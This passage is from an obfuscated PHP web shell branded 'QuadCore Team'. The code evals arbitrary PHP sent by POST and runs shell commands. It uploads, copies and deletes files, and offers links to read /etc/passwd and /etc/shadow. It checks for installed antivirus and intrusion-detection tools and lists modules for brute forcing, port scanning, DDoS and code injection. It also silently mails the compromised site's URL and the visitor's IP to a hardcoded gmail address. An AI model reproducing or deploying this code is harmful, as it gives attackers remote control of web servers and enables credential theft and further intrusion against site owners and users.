as${$clxfbgcoi})${$ntsynqc}.="<option value="".${${"GLOBALS"}["izpnkqej"]}."\" ".($_POST["charset"]==${${"GLOBALS"}["ikpgbmcrqw"]}?"selected":"").">".${$oklsvwwq}."</option>";${$vjxjuoh}=array("Sec. Info"=>"SecInfo","Files"=>"FilesMan","Console"=>"Console","Sql"=>"Sql","Php"=>"Php","Bypasser"=>"SafeMode","Safe Mode"=>"Bypass","String tools"=>"StringTools","Bruteforce"=>"Bruteforce","Network"=>"Network","Readable Dirs"=>"Readable","Port Scanner"=>"PortScanner","Symlink"=>"Symlink","DDoS"=>"Ddos","Mail"=>"Mail","Code Injector"=>"Injector");if(!empty($GLOBALS["auth_pass"]))${${"GLOBALS"}["acytmdtblk"]}["SelfKill"]="SelfRemove";${${"GLOBALS"}["gbgbvwp"]}["Logout"]="Logout";${${"GLOBALS"}["buydpdqgmu"]}="";${"GLOBALS"}["xccbawstjtt"]="v";foreach(${${"GLOBALS"}["acytmdtblk"]} as${${"GLOBALS"}["qcztealr"]}=>${${"GLOBALS"}["lmowkp"]})${${"GLOBALS"}["uawlgehqpbmw"]}.="<th><a href="#\" onclick=\"g('".${${"GLOBALS"}["xccbawstjtt"]}."',null,'','','')\">".${$eflekfzl}."</a></th>";${${"GLOBALS"}["uoamtt"]}="";$gfcfmnl="drives";$gfgmfcrmx="group";if($GLOBALS["os"]=="win"){${"GLOBALS"}["rwoydgqpmhj"]="drive";foreach(range("a","z")as${${"GLOBALS"}["rwoydgqpmhj"]}){${"GLOBALS"}["cjrxyfd"]="drive";${"GLOBALS"}["pcitafhd"]="drives";$vflelmb="drive";${"GLOBALS"}["rxydqje"]="drive";if(is_dir(${${"GLOBALS"}["cjrxyfd"]}.":\"))${${"GLOBALS"}["pcitafhd"]}.="<a href=\"#\" onclick=\"g('FilesMan','".${$vflelmb}.":/')">[ ".${${"GLOBALS"}["rxydqje"]}." ]</a> ";}${${"GLOBALS"}["uoamtt"]}.="<br />: ";}if($GLOBALS["os"]=="nix"){${${"GLOBALS"}["soeeuvcw"]}=@file_get_contents("/etc/named.conf");if(!${${"GLOBALS"}["soeeuvcw"]}){${"GLOBALS"}["xyhnubpl"]="d0c";${${"GLOBALS"}["xyhnubpl"]}="CANT READ named.conf";}else{$ufkiijmd="out";$bnkwbdwznqe="dominios";@preg_match_all("/.*?zone "(.*?)\" {/",${$bnkwbdwznqe},${${"GLOBALS"}["ttiqfflposoq"]});${"GLOBALS"}["suhngquc"]="d0c";${${"GLOBALS"}["ttiqfflposoq"]}=sizeof(array_unique(${${"GLOBALS"}["ttiqfflposoq"]}[1]));${${"GLOBALS"}["suhngquc"]}=${$ufkiijmd}." Domains";}}else{$nwuysjh="d0c";${$nwuysjh}=" --- ";}if($GLOBALS["os"]=="nix"){${${"GLOBALS"}["dyqnvtiwckc"]}="";${${"GLOBALS"}["uslyvfq"]}="";if(!@ini_get("safe_mode")){$hmrxrpirx="userful";$gpvrnfiip="downloaders";${"GLOBALS"}["covkxcgezegb"]="userful";${${"GLOBALS"}["covkxcgezegb"]}=array("gcc","lcc","cc","ld","make","php","perl","python","ruby","tar","gzip","bzip","bzip2","nc","locate","suidperl");foreach(${$hmrxrpirx} as${${"GLOBALS"}["ikpgbmcrqw"]}){$dskgiijk="item";$vxalyqfnc="item";$euvdnzhix="usefl";if(which(${$dskgiijk}))${$euvdnzhix}.=${$vxalyqfnc}.",";}${${"GLOBALS"}["snoxmgdr"]}=array("wget","fetch","lynx","links","curl","get","lwp-mirror");foreach(${$gpvrnfiip} as${${"GLOBALS"}["ykejbb"]}){${"GLOBALS"}["cgbrcvdetdh"]="dwnldr";if(which(${${"GLOBALS"}["ykejbb"]}))${${"GLOBALS"}["cgbrcvdetdh"]}.=${${"GLOBALS"}["ykejbb"]}.",";}}else{${"GLOBALS"}["uxambwyibo"]="dwnldr";${${"GLOBALS"}["dyqnvtiwckc"]}=" ------- ";${${"GLOBALS"}["uxambwyibo"]}=" ------- ";}}else{${"GLOBALS"}["xbvinuvbli"]="usefl";${${"GLOBALS"}["xbvinuvbli"]}=" ------- ";${${"GLOBALS"}["uslyvfq"]}=" ------- ";}echo"<table class="info" cellpadding=\"0" cellspacing="0\" width=\"100%\"><tr><td width=\"160px"><div class="logo\"><img src=\"http://rs1062.pbsrc.com/albums/t498/CarloC97/Anonymous/Anonymous3.png~c200" id="logo" height=\"75%\" width="90%"/></div><hr style=\"margin: -5px 13px 2px 17px;width:160px;\"><div class="eca1\">QuadCore</div><div class=\"eca2">Team</div></td>
  98. <td><table cellpadding=\"3" cellspacing="0" class="npoad\"><tr><td width=\"125px;"><span>Uname</span></td><td>: <nobr>".substr(@php_uname(),0,120)."</nobr></td></tr>
  99. <tr><td><span>User</span></td><td>: ".${${"GLOBALS"}["pkirecjc"]}." ( ".${$ibixotufm}." ) <span>Group: </span> ".${${"GLOBALS"}["rpdeiuwr"]}." ( ".${$gfgmfcrmx}." )</td></tr><tr><td><span>Server</span></td><td>: ".@getenv("SERVER_SOFTWARE")."</td></tr><tr><td><span>Useful</span></td><td>: ".${${"GLOBALS"}["sgigkayhf"]}."</td></tr><tr><td><span>Downloaders</span></td><td>: ".${${"GLOBALS"}["tgnxfsjmkx"]}."</td></tr><tr><td><span>Disabled functions</span></td><td>: ".(${${"GLOBALS"}["tsmxmkykzdy"]}?${${"GLOBALS"}["gokbihttud"]}:"All Function Enable")."</td></tr><tr><td><span>".($GLOBALS["os"]=="win"?"Drives<br />Cwd":"Cwd")."</span></td><td>: ".${$gfcfmnl}."".${$ttdrjqhdxg}." ".viewPermsColor($GLOBALS["cwd"])." <a href=# onclick=\"g('FilesMan','".$GLOBALS["home_cwd"]."','','','')">[ home ]</a></td></tr></table></td>"."<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>"."<td><nobr>: ".gethostbyname($_SERVER["HTTP_HOST"])."<br>: ".$_SERVER["REMOTE_ADDR"]."<br />: ".viewSize(${$lvtzwlhd})."<br />: ".viewSize(${${"GLOBALS"}["ljspypl"]})." (".(int)(${${"GLOBALS"}["ljspypl"]}/${${"GLOBALS"}["lqdjebkshtjr"]}*100)."%)<br>: ".@phpversion()." <a href=# onclick="g('Php',null,null,'info')">[ phpinfo ]</a><br />: ".($GLOBALS["safe_mode"]?"<font color=red>ON</font>":"<font color=".${${"GLOBALS"}["ohwplvci"]}."<b>OFF</b></font>")."<br />: ".${${"GLOBALS"}["oblbuzmw"]}."</nobr></td></tr></table>"."</div></div><div style="margin:5;background:#444;\"><div class="content" style="border-top:5px solid #444;padding:2px;"><table cellpadding="3\" cellspacing="0" width="100%\" class="menu"><tr>".${${"GLOBALS"}["buydpdqgmu"]}."</tr></table></div></div><div style=\"margin:5;background:#444;">";}function printFooter(){${"GLOBALS"}["ckqlqgcw"]="is_writable";${"GLOBALS"}["ujkgsqfyv"]="is_writable";${${"GLOBALS"}["vjzfhubux"]}=is_writable($GLOBALS["cwd"])?"<font color=#6699ff>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";echo"</div><div style="margin:5px;background:#444;"><div class="content" style=\"border-top:5px solid #444;">
  100. <table class=\"info" id=\"toolsTbl" cellpadding=\"3" cellspacing="0\" width=\"100%\">
  101. <tr>
  102. <td><form onsubmit=\"g(null,this.c.value);return false;"><span>Change dir:</span><br><input class=\"toolsInp\" type=text name=c value=\"".htmlspecialchars($GLOBALS["cwd"])."\"><input type=submit value=\">>\"></form></td>
  103. <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class="toolsInp\" type=text name=f><input type=submit value=\">>"></form></td>
  104. </tr>
  105. <tr>
  106. <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span><br><input class=\"toolsInp\" type=text name=d><input type=submit value=">>\"></form>".${${"GLOBALS"}["vjzfhubux"]}."</td>
  107. <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp\" type=text name=f><input type=submit value=">>\"></form>".${${"GLOBALS"}["ckqlqgcw"]}."</td>
  108. </tr>
  109. <tr>
  110. <td><form onsubmit=\"g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class=\"toolsInp\" type=text name=c value=\"\"><input type=submit value=\">>\"></form></td>
  111. <td><form method=\"post\" ENCTYPE="multipart/form-data">
  112. <input type=hidden name=a value="FilesMAn\">
  113. <input type=hidden name=c value=\"".htmlspecialchars($GLOBALS["cwd"])."\">
  114. <input type=hidden name=p1 value=\"uploadFile\">
  115. <input type=hidden name=charset value=\"".(isset($_POST["charset"])?$_POST["charset"]:"")."\">
  116. <span>Upload file:</span><br><input class=\"toolsInp\" type=file name=f><input type=submit value=">>\"></form>".${${"GLOBALS"}["ujkgsqfyv"]}."</td>
  117. </tr>
  118. </table></div></div>
  119. <div style=\"margin:5px;background:#444;"><div class=\"content" style=\"border-top:5px solid #444;text-align:center;font-weight:bold;\">*** QuadCore Team ***".VERSION." &copy; By ./QuadCore</div></div>
  120. </div>
  121. </body></html>";}if(!function_exists("posix_getpwuid")&&(strpos($GLOBALS["disable_functions"],"posix_getpwuid")===false)){function posix_getpwuid($p){return false;}}if(!function_exists("posix_getgrgid")&&(strpos($GLOBALS["disable_functions"],"posix_getgrgid")===false)){function posix_getgrgid($p){return false;}}if(!isset($_SESSION["trimite"])){$kpldlkoh="url";${${"GLOBALS"}["ktcoemnqubk"]}=$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]."<br />User IP: ".$_SERVER["REMOTE_ADDR"].(isset($_SERVER["HTTP_X_FORWARDED_FOR"])?"(".$_SERVER["HTTP_X_FORWARDED_FOR"].")":"");@mail("informationsecuriter@gmail.com","Smurfie",${$kpldlkoh});$_SESSION["trimite"]=true;}function viewSize($s){$rdedjprb="s";${"GLOBALS"}["oyydjyrn"]="s";$emlwdcyat="s";if(${$rdedjprb}>=1073741824)return sprintf("%1.2f",${${"GLOBALS"}["yehwhksilho"]}/1073741824)." GB";elseif(${${"GLOBALS"}["oyydjyrn"]}>=1048576)return sprintf("%1.2f",${${"GLOBALS"}["yehwhksilho"]}/1048576)." MB";elseif(${${"GLOBALS"}["yehwhksilho"]}>=1024)return sprintf("%1.2f",${${"GLOBALS"}["yehwhksilho"]}/1024)." KB";else return${$emlwdcyat}." B";}function perms($p){$wvkesxm="i";$lslleudutbv="i";$ekeremjooyfd="i";$glpyhho="i";${"GLOBALS"}["xhdquwr"]="i";$jwidacncy="p";${"GLOBALS"}["hhejhk"]="p";$qjgcmgh="p";$jpenbfehih="p";$xhettah="p";$skhegsyo="p";${"GLOBALS"}["onhiinlb"]="i";$mhbjjndj="i";${"GLOBALS"}["ooekqiw"]="p";if((${${"GLOBALS"}["chpcnlbltty"]}&0xC000)==0xC000)${$ekeremjooyfd}="s";elseif((${${"GLOBALS"}["chpcnlbltty"]}&0xA000)==0xA000)${${"GLOBALS"}["xhdquwr"]}="l";elseif((${$xhettah}&0x8000)==0x8000)${$lslleudutbv}="-";elseif((${${"GLOBALS"}["chpcnlbltty"]}&0x6000)==0x6000)${${"GLOBALS"}["rcrtozri"]}="b";elseif((${${"GLOBALS"}["chpcnlbltty"]}&0x4000)==0x4000)${${"GLOBALS"}["rcrtozri"]}="d";elseif((${$skhegsyo}&0x2000)==0x2000)${${"GLOBALS"}["rcrtozri"]}="c";elseif((${${"GLOBALS"}["chpcnlbltty"]}&0x1000)==0x1000)${$wvkesxm}="p";else${${"GLOBALS"}["rcrtozri"]}="u";${${"GLOBALS"}["rcrtozri"]}.=((${$jwidacncy}&0x0100)?"r":"-");${${"GLOBALS"}["onhiinlb"]}.=((${$jpenbfehih}&0x0080)?"w":"-");${${"GLOBALS"}["rcrtozri"]}.=((${${"GLOBALS"}["chpcnlbltty"]}&0x0040)?((${$qjgcmgh}&0x0800)?"s":"x"):((${${"GLOBALS"}["chpcnlbltty"]}&0x0800)?"S":"-"));$jcxdlphi="i";${$glpyhho}.=((${${"GLOBALS"}["chpcnlbltty"]}&0x0020)?"r":"-");${${"GLOBALS"}["rcrtozri"]}.=((${${"GLOBALS"}["chpcnlbltty"]}&0x0010)?"w":"-");${$jcxdlphi}.=((${${"GLOBALS"}["chpcnlbltty"]}&0x0008)?((${${"GLOBALS"}["chpcnlbltty"]}&0x0400)?"s":"x"):((${${"GLOBALS"}["chpcnlbltty"]}&0x0400)?"S":"-"));${$mhbjjndj}.=((${${"GLOBALS"}["chpcnlbltty"]}&0x0004)?"r":"-");${${"GLOBALS"}["rcrtozri"]}.=((${${"GLOBALS"}["ooekqiw"]}&0x0002)?"w":"-");${${"GLOBALS"}["rcrtozri"]}.=((${${"GLOBALS"}["chpcnlbltty"]}&0x0001)?((${${"GLOBALS"}["chpcnlbltty"]}&0x0200)?"t":"x"):((${${"GLOBALS"}["hhejhk"]}&0x0200)?"T":"-"));return${${"GLOBALS"}["rcrtozri"]};}function viewPermsColor($f){${"GLOBALS"}["yixoijqor"]="f";$hbkpxxgz="f";if(!@is_readable(${${"GLOBALS"}["itetujfjtui"]}))return"<font color=#FF0000><b>".perms(@fileperms(${${"GLOBALS"}["yixoijqor"]}))."</b></font>";elseif(!@is_writable(${${"GLOBALS"}["itetujfjtui"]}))return"<font color=white><b>".perms(@fileperms(${${"GLOBALS"}["itetujfjtui"]}))."</b></font>";else return"<font color=#3399CC><b>".perms(@fileperms(${$hbkpxxgz}))."</b></font>";}if(!function_exists("scandir")){function scandir($dir){$nlxwdng="dh";$qigeejfmlfo="dh";${$nlxwdng}=opendir(${${"GLOBALS"}["xlevutfqzr"]});while(false!==(${${"GLOBALS"}["mmanwsrndvkm"]}=readdir(${$qigeejfmlfo}))){${"GLOBALS"}["nompswdnru"]="filename";${${"GLOBALS"}["kwvaxvtju"]}[]=${${"GLOBALS"}["nompswdnru"]};}return${${"GLOBALS"}["kwvaxvtju"]};}}function actionSecInfo(){printHeader();${"GLOBALS"}["luuvnyxbrfv"]="temp";$kuyeswhl="temp";echo"<h1>Server security information</h1><div class=content>";$hjftkutmttvw="temp";function showSecParam($n,$v){${"GLOBALS"}["mqhmmtbu"]="v";${${"GLOBALS"}["mqhmmtbu"]}=trim(${${"GLOBALS"}["dyhbggvolpv"]});if(${${"GLOBALS"}["dyhbggvolpv"]}){${"GLOBALS"}["fwgjypdpo"]="v";${"GLOBALS"}["ltokcri"]="v";${"GLOBALS"}["nbxlpkhy"]="n";echo"<span>".${${"GLOBALS"}["nbxlpkhy"]}.": </span>";${"GLOBALS"}["louhiggbyh"]="v";if(strpos(${${"GLOBALS"}["louhiggbyh"]},"")===false)echo${${"GLOBALS"}["fwgjypdpo"]}."<br>";else echo"<pre class=ml1>".${${"GLOBALS"}["ltokcri"]}."</pre>";}}showSecParam("Server software",@getenv("SERVER_SOFTWARE"));showSecParam("Disabled PHP Functions",($GLOBALS["disable_functions"])?$GLOBALS["disable_functions"]:"none");showSecParam("Open base dir",@ini_get("open_basedir"));showSecParam("Safe mode exec dir",@ini_get("safe_mode_exec_dir"));showSecParam("Safe mode include dir",@ini_get("safe_mode_include_dir"));showSecParam("cURL support",function_exists("curl_version")?"enabled":"no");${"GLOBALS"}["thadoasnd"]="temp";${${"GLOBALS"}["mchkcbti"]}=array();if(function_exists("mysql_get_client_info"))${$kuyeswhl}[]="MySql (".mysql_get_client_info().")";if(function_exists("mssql_connect"))${${"GLOBALS"}["luuvnyxbrfv"]}[]="MSSQL";if(function_exists("pg_connect"))${${"GLOBALS"}["mchkcbti"]}[]="PostgreSQL";if(function_exists("oci_connect"))${$hjftkutmttvw}[]="Oracle";showSecParam("Supported databases",implode(", ",${${"GLOBALS"}["thadoasnd"]}));echo"<br>";if($GLOBALS["os"]=="nix"){$fniyqhys="userful";$ycyhcdlel="danger";${$fniyqhys}=array("gcc","lcc","cc","ld","make","php","perl","python","ruby","tar","gzip","bzip","bzip2","nc","locate","suidperl");${$ycyhcdlel}=array("kav","nod32","bdcored","uvscan","sav","drwebd","clamd","rkhunter","chkrootkit","iptables","ipfw","tripwire","shieldcc","portsentry","snort","ossec","lidsadm","tcplodg","sxid","logcheck","logwatch","sysmask","zmbscap","sawmill","wormscan","ninja");${${"GLOBALS"}["snoxmgdr"]}=array("wget","fetch","lynx","links","curl","get","lwp-mirror");showSecParam("Readable /etc/passwd",@is_readable("/etc/passwd")?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", "passwd\")'>[view]</a>":"no");showSecParam("Readable /etc/shadow",@is_readable("/etc/shadow")?"yes <a href='#' onclick='g(\"FilesTools", "etc", "shadow")'>[view]</a>":"no");showSecParam("OS version",@file_get_contents("/proc/version"));showSecParam("Distr name",@file_get_contents("/etc/issue.net"));if(!$GLOBALS["safe_mode"]){$kuumyksicz="temp";$vrvlumx="temp";echo"<br>";$yjlinb="item";${"GLOBALS"}["mgxkreitk"]="item";${"GLOBALS"}["nwudhrmtu"]="item";${$kuumyksicz}=array();foreach(${${"GLOBALS"}["nfmvpmprpfm"]} as${${"GLOBALS"}["nwudhrmtu"]}){if(which(${${"GLOBALS"}["ikpgbmcrqw"]})){${"GLOBALS"}["jtuetvhqc"]="item";${${"GLOBALS"}["mchkcbti"]}[]=${${"GLOBALS"}["jtuetvhqc"]};}}showSecParam("Userful",implode(", ",${$vrvlumx}));$lbvjpag="danger";${${"GLOBALS"}["mchkcbti"]}=array();foreach(${$lbvjpag} as${$yjlinb}){${"GLOBALS"}["scemkk"]="item";if(which(${${"GLOBALS"}["scemkk"]})){${${"GLOBALS"}["mchkcbti"]}[]=${${"GLOBALS"}["ikpgbmcrqw"]};}}showSecParam("Danger",implode(", ",${${"GLOBALS"}["mchkcbti"]}));${${"GLOBALS"}["mchkcbti"]}=array();foreach(${${"GLOBALS"}["snoxmgdr"]} as${${"GLOBALS"}["mgxkreitk"]}){if(which(${${"GLOBALS"}["ikpgbmcrqw"]})){${${"GLOBALS"}["mchkcbti"]}[]=${${"GLOBALS"}["ikpgbmcrqw"]};}}showSecParam("Downloaders",implode(", ",${${"GLOBALS"}["mchkcbti"]}));echo"<br/>";showSecParam("Hosts",@file_get_contents("/etc/hosts"));showSecParam("HDD space",ex("df -h"));showSecParam("Mount options",@file_get_contents("/etc/fstab"));}}else{showSecParam("OS Version",ex("ver"));showSecParam("Account Settings",ex("net accounts"));showSecParam("User Accounts",ex("net user"));}echo"</div>";printFooter();}function actionPhp(){if(isset($_POST["ajax"])){$_SESSION[md5($_SERVER["HTTP_HOST"])."ajax"]=true;ob_start();eval($_POST["p1"]);${${"GLOBALS"}["mchkcbti"]}="document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean())," \'")."';";echo strlen(${${"GLOBALS"}["mchkcbti"]}),"",${${"GLOBALS"}["mchkcbti"]};exit;}printHeader();if(isset($_POST["p2"])&&($_POST["p2"]=="info")){echo"<h1>PHP info</h1><div class=content>";${"GLOBALS"}["kwjthfvu"]="tmp";${"GLOBALS"}["xywsckt"]="tmp";$frwlqkf="tmp";ob_start();$guudncxfvxp="tmp";${"GLOBALS"}["noguhmhr"]="tmp";phpinfo();${${"GLOBALS"}["noguhmhr"]}=ob_get_clean();${"GLOBALS"}["akinef"]="tmp";${${"GLOBALS"}["pmvkpva"]}=preg_replace("!body {.*}!msiU","",${${"GLOBALS"}["pmvkpva"]});${$guudncxfvxp}=preg_replace("!a:\w+ {.*}!msiU","",${${"GLOBALS"}["pmvkpva"]});${${"GLOBALS"}["kwjthfvu"]}=preg_replace("!h1!msiU","h2",${${"GLOBALS"}["pmvkpva"]});${${"GLOBALS"}["pmvkpva"]}=preg_replace("!td, th {(.*)}!msiU",".e, .v, .h, .h th {\$1}",${${"GLOBALS"}["akinef"]});${$frwlqkf}=preg_replace("!body, td, th, h2, h2 {.*}!msiU","",${${"GLOBALS"}["pmvkpva"]});echo${${"GLOBALS"}["xywsckt"]};echo"</div><br>";}if(empty($_POST["ajax"])&&!empty($_POST["p1"]))$_SESSION[md5($_SERVER["HTTP_HOST"])."ajax"]=false;echo"<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit=\"if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,'');}return false;\"><textarea name=code class=bigarea id=PhpCode>".(!empty($_POST["p1"])?htmlspecialchars($_POST["p1"]):"")."</textarea><input type=submit value=Eval style=\"margin-top:5px\">";echo" <input type=checkbox name=ajax value=1 ".(@$_SESSION[md5($_SERVER["HTTP_HOST"])."ajax"]?"checked":"")."> send using AJAX</form><pre id=PhpOutput style="".(empty($_POST["p1"])?"display:none;":"")."margin-top:5px;" class=ml1>";if(!empty($_POST["p1"])){ob_start();eval($_POST["p1"]);echo htmlspecialchars(ob_get_clean());}echo"</pre></div>";printFooter();}function actionFilesMan(){${"GLOBALS"}["qayfsgtru"]="n";$psmqlny="links";printHeader();$pvbbpwe="dirContent";echo"<h1>File manager</h1><div class=content>";if(isset($_POST["p1"])){switch($_POST["p1"]){case"uploadFile":if(!@move_uploaded_file($_FILES["f"]["tmp_name"],$_FILES["f"]["name"]))echo"Can't upload file!";break;break;case"mkdir":if(!@mkdir($_POST["p2"]))echo"Can't create new dir";break;case"delete":function deleteDir($path){${"GLOBALS"}["pemxciex"]="path";$kllyzfwxn="dh";${"GLOBALS"}["fomldjhb"]="dh";${"GLOBALS"}["cxmrupnlvxha"]="path";$grbkpbsx="path";$qqhsjuzro="item";$gwbcruw="dh";${${"GLOBALS"}["ohukdtuyelta"]}=(substr(${$grbkpbsx},-1)=="/")?${${"GLOBALS"}["pemxciex"]}:${${"GLOBALS"}["ohukdtuyelta"]}."/";${${"GLOBALS"}["fomldjhb"]}=opendir(${${"GLOBALS"}["ohukdtuyelta"]});while((${$qqhsjuzro}=readdir(${$gwbcruw}))!==false){${"GLOBALS"}["lhbwbdllg"]="type";$qtoscbutsp="type";$lxavpmn="item";${${"GLOBALS"}["ikpgbmcrqw"]}=${${"GLOBALS"}["ohukdtuyelta"]}.${${"GLOBALS"}["ikpgbmcrqw"]};${"GLOBALS"}["gcbbqovnuvv"]="item";${"GLOBALS"}["doxjjmwkmiq"]="item";if((basename(${${"GLOBALS"}["ikpgbmcrqw"]})=="..")||(basename(${$lxavpmn})=="."))continue;${${"GLOBALS"}["lhbwbdllg"]}=filetype(${${"GLOBALS"}["ikpgbmcrqw"]});if(${$qtoscbutsp}=="dir")deleteDir(${${"GLOBALS"}["doxjjmwkmiq"]});else@unlink(${${"GLOBALS"}["gcbbqovnuvv"]});}closedir(${$kllyzfwxn});rmdir(${${"GLOBALS"}["cxmrupnlvxha"]});}if(is_array(@$_POST["f"])){$fdzuceo="f";foreach($_POST["f"]as${$fdzuceo}){$gcvfyofblfk="f";$tlgeilubb="f";$venjmv="f";${$gcvfyofblfk}=urldecode(${${"GLOBALS"}["itetujfjtui"]});if(is_dir(${$venjmv}))deleteDir(${${"GLOBALS"}["itetujfjtui"]});else@unlink(${$tlgeilubb});}}break;case"paste":if($_SESSION["act"]=="copy"){function copy_paste($c,$s,$d){${"GLOBALS"}["nizzhl"]="s";$sypofoiimvx="s";if(is_dir(${${"GLOBALS"}["grdeva"]}.${$sypofoiimvx})){mkdir(${${"GLOBALS"}["kdlkocrcdp"]}.${${"GLOBALS"}["yehwhksilho"]});${${"GLOBALS"}["mewyajus"]}=opendir(${${"GLOBALS"}["grdeva"]}.${${"GLOBALS"}["yehwhksilho"]});while((${${"GLOBALS"}["itetujfjtui"]}=readdir(${${"GLOBALS"}["mewyajus"]}))!==false){if((${${"GLOBALS"}["itetujfjtui"]}!=".")and(${${"GLOBALS"}["itetujfjtui"]}!="..")){$fqsccxchwn="s";$fdsksrg="c";${"GLOBALS"}["eszihzwcz"]="d";$hxekpsgd="s";copy_paste(${$fdsksrg}.${$hxekpsgd}."/",${${"GLOBALS"}["itetujfjtui"]},${${"GLOBALS"}["eszihzwcz"]}.${$fqsccxchwn}."/");}}}elseif(is_file(${${"GLOBALS"}["grdeva"]}.${${"GLOBALS"}["nizzhl"]})){${"GLOBALS"}["pphjfzqct"]="d";$vftsbqolld="c";$pknjwox="s";@copy(${$vftsbqolld}.${${"GLOBALS"}["yehwhksilho"]},${${"GLOBALS"}["pphjfzqct"]}.${$pknjwox});}}foreach($_SESSION["f"]as${${"GLOBALS"}["itetujfjtui"]})copy_paste($_SESSION["cwd"],${${"GLOBALS"}["itetujfjtui"]},$GLOBALS["cwd"]);}elseif($_SESSION["act"]=="move"){function move_paste($c,$s,$d){$greegu="c";${"GLOBALS"}["lpgiqycnazds"]="s";$ihooqv="s";if(is_dir(${${"GLOBALS"}["grdeva"]}.${$ihooqv})){$lhyqinwi="s";${"GLOBALS"}["toxkgnka"]="h";$vncwwgquoy="f";mkdir(${${"GLOBALS"}["kdlkocrcdp"]}.${$lhyqinwi});${${"GLOBALS"}["toxkgnka"]}=opendir(${${"GLOBALS"}["grdeva"]}.${${"GLOBALS"}["yehwhksilho"]});while((${$vncwwgquoy}=readdir(${${"GLOBALS"}["mewyajus"]}))!==false){$alpyhey="f";if((${${"GLOBALS"}["itetujfjtui"]}!=".")and(${$alpyhey}!="..")){${"GLOBALS"}["wdrelgmge"]="s";${"GLOBALS"}["jnsnwbq"]="s";copy_paste(${${"GLOBALS"}["grdeva"]}.${${"GLOBALS"}["jnsnwbq"]}."/",${${"GLOBALS"}["itetujfjtui"]},${${"GLOBALS"}["kdlkocrcdp"]}.${${"GLOBALS"}["wdrelgmge"]}."/");}}}elseif(is_file(${$greegu}.${${"GLOBALS"}["lpgiqycnazds"]})){${"GLOBALS"}["jufxfpu"]="d";${"GLOBALS"}["qcnydzdv"]="s";@copy(${${"GLOBALS"}["grdeva"]}.${${"GLOBALS"}["yehwhksilho"]},${${"GLOBALS"}["jufxfpu"]}.${${"GLOBALS"}["qcnydzdv"]});}}$lvegffobr="f";foreach($_SESSION["f"]as${${"GLOBALS"}["itetujfjtui"]})@rename($_SESSION["cwd"].${$lvegffobr},$GLOBALS["cwd"].${${"GLOBALS"}["itetujfjtui"]});}unset($_SESSION["f"]);break;default:if(!empty($_POST["p1"])&&(($_POST["p1"]=="copy")||($_POST["p1"]=="move"))){${"GLOBALS"}["hqrpsidqyx"]="f";$phlqkumivb="k";$_SESSION["act"]=@$_POST["p1"];$_SESSION["f"]=@$_POST["f"];foreach($_SESSION["f"]as${$phlqkumivb}=>${${"GLOBALS"}["itetujfjtui"]})$_SESSION["f"][${${"GLOBALS"}["qcztealr"]}]=urldecode(${${"GLOBALS"}["hqrpsidqyx"]});$_SESSION["cwd"]=@$_POST["c"];}break;}echo"<script>document.mf.p1.value=\"";document.mf.p2.value=\"\";</script>";}${${"GLOBALS"}["dtbigpgfvo"]}=@scandir(isset($_POST["c"])?$_POST["c"]:$GLOBALS["cwd"]);$dpqaykdz="sort";if(${$pvbbpwe}===false){echo"Can't open this folder!";return;}global$sort;$wehlalfd="sort";$tpyiikox="files";${$wehlalfd}=array("name",1);if(!empty($_POST["p1"])){if(preg_match("!s_([A-z]+)_(\d{1})!",$_POST["p1"],${${"GLOBALS"}["sqbcihxjwxc"]}))${${"GLOBALS"}["rlxsszdo"]}=array(${${"GLOBALS"}["sqbcihxjwxc"]}[1],(int)${${"GLOBALS"}["sqbcihxjwxc"]}[2]);}${"GLOBALS"}["sqbgnpmreke"]="i";${"GLOBALS"}["jsqotkf"]="n";echo"<script>
  122. function sa() {
  123. for(i=0;i<document.files.elements.length;i++)
  124. if(document.files.elements[i].type == 'checkbox')
  125. document.files.elements[i].checked = document.files.elements[0].checked;
  126. }
  127. </script>
  128. <table width='100%' class='main' cellspacing='0' cellpadding='2'>
  129. <form name=files method=post>";${"GLOBALS"}["fwxvfylofy"]="sort";$dxqjxghtv="links";echo"<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan\",null,"s_name_".(${$dpqaykdz}[1]?0:1)."")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,"s_size_".(${${"GLOBALS"}["fwxvfylofy"]}[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan",null,\"s_modify_".(${${"GLOBALS"}["rlxsszdo"]}[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan\",null,\"s_perms_".(${${"GLOBALS"}["rlxsszdo"]}[1]?0:1)."")'>Permissions</a></th><th>Actions</th></tr>";${${"GLOBALS"}["kkcaes"]}=${${"GLOBALS"}["kwvaxvtju"]}=${$dxqjxghtv}=array();${${"GLOBALS"}["qayfsgtru"]}=count(${${"GLOBALS"}["dtbigpgfvo"]});for(${${"GLOBALS"}["rcrtozri"]}=0;${${"GLOBALS"}["sqbgnpmreke"]}<${${"GLOBALS"}["jsqotkf"]};${${"GLOBALS"}["rcrtozri"]}++){$xfjlrv="i";${"GLOBALS"}["uqsacjc"]="dirContent";${"GLOBALS"}["wxitibxjb"]="dirContent";$fetkmmeo="gr";${"GLOBALS"}["vmrrdvp"]="files";$nwjqvkomff="i";${"GLOBALS"}["jlonig"]="i";$pikrltvilkde="i";${"GLOBALS"}["mgypwfcol"]="dirContent";$jlwjxkcsye="i";$gsizdosk="ow";${"GLOBALS"}["ekbkfqadrg"]="gr";$btyzbgbsfv="dirs";${${"GLOBALS"}["nvzkwquqtcv"]}=@posix_getpwuid(@fileowner(${${"GLOBALS"}["wxitibxjb"]}[${${"GLOBALS"}["rcrtozri"]}]));$trksqxk="dirContent";$bcoveqcbxn="i";${"GLOBALS"}["lbbiehgd"]="dirContent";${"GLOBALS"}["krvmbfigto"]